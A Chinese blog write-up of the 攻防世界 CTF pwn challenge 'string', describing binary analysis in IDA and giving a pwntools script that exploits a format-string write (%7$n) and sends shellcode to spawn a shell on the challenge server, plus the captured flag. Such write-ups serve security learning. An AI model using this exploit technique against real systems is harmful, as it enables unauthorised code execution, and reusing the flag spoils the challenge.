[攻防世界]string

string

解析

先checksec一下,发现除了PIE全开。
在这里插入图片描述
拖入ida中看一下有什么,对照运行时候的状态。
在这里插入图片描述
之后进入了sub_400D72这个函数里面,参数是v4,也就是secret的地址
在这里插入图片描述
之后到了这里,这里输入的长度,不可以超过0xc的长度,也就是12位的长度,之后继续往下走。
在这里插入图片描述
到了这里,发现输入east可以继续走下去,如果输入up会进入一个循环,继续往下走。
在这里插入图片描述
到了,这里,发现输入1才可以往下继续运行注意ida里面的红框,最下面那个是格式化字符串发生的地方,那么就先找偏移。
在这里插入图片描述
可以知道偏移是8,那么脚本可以写了。

脚本

from pwn import *
#p = process('./string')
p =remote('111.200.241.244',61639)
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p.recvuntil(b"secret[0] is")
secret = int(p.recv(7),16)
print(secret)
p.sendlineafter(b'name be:\n',b'aaaaa')
p.sendlineafter(b'east or up?:\n',b'east')
p.sendlineafter(b'leave(0)?:',b'1')
p.sendlineafter(b'\'Give me an address\'',str(secret))
p.sendlineafter(b'And, you wish is:\n',b'a'*85+b'%7$n' )
p.sendline(asm(shellcraft.sh()))
p.interactive()

获得flag是cyberpeace{34a2d5d30934957e820d19a1b058c127}

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值